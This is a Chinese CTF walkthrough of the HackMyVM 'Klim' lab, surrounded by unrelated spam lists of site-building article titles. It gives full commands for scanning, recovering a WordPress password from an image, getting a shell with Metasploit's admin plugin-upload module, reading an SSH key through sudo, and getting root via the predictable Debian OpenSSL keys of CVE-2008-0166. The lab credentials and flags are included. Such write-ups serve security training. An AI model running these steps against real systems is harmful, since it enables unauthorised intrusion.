当前位置: 首页 > news >正文

网站页脚模板小语种网站建设公司

网站页脚模板,小语种网站建设公司,注册做网站的公司,网络规划设计师教程第三版云盘下载目录 一、测试环境 1、系统环境 2、使用工具/软件 二、测试目的 三、操作过程 1、信息搜集 2、Getshell 3、提权 CVE-2008-0166 四、结论 一、测试环境 1、系统环境 渗透机#xff1a;kali2021.1(192.168.159.127) 靶 机#xff1a;debian(192.168.159.27) 注意事…目录 一、测试环境 1、系统环境 2、使用工具/软件 二、测试目的 三、操作过程 1、信息搜集 2、Getshell 3、提权 CVE-2008-0166 四、结论 一、测试环境 1、系统环境 渗透机kali2021.1(192.168.159.127) 靶  机debian(192.168.159.27) 注意事项 ①该类型靶场只能在virtualBox上搭建因此将靶机设置为桥接网络方便进行渗透。攻击机kali也要桥接出来不然会出问题。 ②靶机启动失败设置中取消勾选usb即可 ​ 2、使用工具/软件 Kali: arp-scan(主机探测)、nmap(端口和服务扫描)、gobuster(目录扫描)、cmseek(获取cms信息)、stegseek(分析图片隐藏信息)、msfconsole(漏洞利用模块)、ssh(远程登录) 测试网址http://192.168.159.27 靶场介绍由国外大佬搭建的靶场类似于vulnhub经常更新需要翻墙才能进。 地址https://hackmyvm.eu/machines/machine.php?vmKlim 二、测试目的 熟悉wordpress漏洞熟悉ssh登录流程以及CVE-2008-0166漏洞利用。获取2个flag。 三、操作过程 1、信息搜集 主机探测 arp-scan -l 靶机IP192.168.159.27 物理机IP192.168.159.241 端口和服务探测 nmap -sT -A -p- -T4 192.168.159.27 靶机开放了22端口(ssh服务)、80端口(web服务) 目录扫描 gobuster dir -u http://192.168.159.27 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,jsp,html,txt 有wordpress目录 扫描wordpress目录 gobuster dir -u http://192.168.159.27/wordpress -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,jsp,html,txt 扫描wordpress/wp-content目录该目录存在uploads目录 查看wordpress信息 ​cmseek -u http://192.168.159.27/wordpress 获取用户名klim 2、Getshell 在wordpress/wp-content/uploads目录中找到一张图片 获取该图片查看是否有隐藏信息 stegseek image.jpg 可以看到找到了密码输出了文件是有东西的 查看文件发现是数据包而且有klim用户的密码 cat image.jpg.out klim/ss7WhrrnnHOZC%239bQn 数据包是经过url编码的将密码解码 klim/ss7WhrrnnHOZC#9bQn 现在可以登录wordpress了 在Plugins—Add New Plugin—Upload Plugin处可以上传文件直接上传木马会被拦 使用msfconsole模块集成利用上传插件漏洞 use exploit/unix/webapp/wp_admin_shell_upload set rhost 192.168.159.27 set targeturi /wordpress set username klim set password ss7WhrrnnHOZC#9bQn run 成功返回meterpreter会话 3、提权 获取交互式shell并查看sudo权限 python3 -c import pty;pty.spawn(/bin/bash) sudo -l 看到能以klim用户身份执行/home/klim/tool工具 使用file查看该文件是一个可执行文件 file /home/klim/tool 使用help参数查看工具解析可以看出这是cat命令和cat命令一个作用 sudo -u klim /home/klim/tool --help 可以查看文件那么首先查看klim用户家目录的文件 存在.ssh目录查看私钥文件 ls -la /home/klim sudo -u klim /home/klim/tool /home/klim/.ssh/id_rsa 将私钥写入id文件并ssh登录klim用户 vim id chmod 600 id ssh klim192.168.159.27 -i id 在当前目录查看user.txt cat user.txt user.txt: 2fbef74059deaea1e5e11cff5a65b68e CVE-2008-0166 基于Debian的操作系统上的OpenSSL 0.9.8c-1到0.9.8g-9之前的版本使用随机数生成器生成可预测的数字这使得远程攻击者更容易对加密密钥进行暴力猜测攻击。 这个漏洞存在生成的ssh密钥便可被预测数量有限。所有ssh密钥对在如下地址下载 https://github.com/g0tmi1k/debian-ssh/blob/master/common_keys/debian_ssh_rsa_2048_x86.tar.bz2 下载完成后解压可以在rsa/2048目录下查看所有公钥私钥 tar -xjf debian_ssh_rsa_2048_x86.tar.bz2 cd rsa/2048 ls 利用该漏洞需要找到公钥然后根据公钥找到私钥 寻找公钥文件发现在/opt目录下有个公钥文件正是root用户的公钥文件 find / -name id_rs* -ls 2/dev/null 根据公钥的加密信息去匹配已知公钥的编号 使用ssh登录私钥指定为该编号即可 ssh root192.168.159.27 -i 54701a3b124be15d4c8d3cf2da8f0139-2005 cat root.txt root.txt: 60667e12c8ea62295de82d053d950e1f 四、结论 Wordpress的文件上传漏洞可以利用openssl的漏洞导致私钥可被查询出来。
http://www.ho-use.cn/article/10820998.html

相关文章:

  • 如何让网站做网页适配深圳做网站服务
  • 网站设置为默认主页厦门做网页网站的公司
  • 做外贸都有哪些好网站付费网站做推广哪个好
  • 彩票网站开发技术定制做网站开发
  • 网站导航条内容商业网站建设的方法
  • 如何做网站商城淘宝客的网站是自己做的吗
  • 2023年做网站怎么样昆明百度推广开户
  • 制作网页的网站哪个好用青之峰网站建设
  • 做风险投资网站python网站开发
  • 深圳网站建设服务公司国内互联网建站公司排名
  • 永康市建设局网站中国建设银行集团网站
  • 网站后台管理系统有哪些wordpress激活码充值
  • 旅游营销型网站建设中国建设银行青海分行网站
  • 虚拟币交易网站建设网站dns解析失败
  • 建站之星怎么弄相册wordpress二级页面菜单
  • 微网站建设的第一步是进行首页的设置杨小刀网站建设
  • 品牌网站建设费用北京最新消息发布
  • 网站建设 优化松江微网站建设
  • 手机网站建站教程旅行做攻略的网站
  • 鲜花网站开发与设计怎么给新网站做推广
  • 国内最大的网站建设公司排名数据库wordpress搬家
  • 做家具城网站的意义好的做淘宝详情页的网站有哪些内容
  • 网站建设的要点是什么中国商标官网入口
  • 网站关键词优化排名软件新闻摘抄四年级下册
  • 重庆网站建设设计公司哪家好wordpress悬浮电话插件
  • 盐城市规划建设局网站酒店设计
  • 可以做宣传图的网站国外设计欣赏网站
  • 免费外链网站seo发布施工企业介绍
  • 集团网站建设招标管理员界面wordpress
  • 湖北建设执业资格注册中心网站工业网页设计欣赏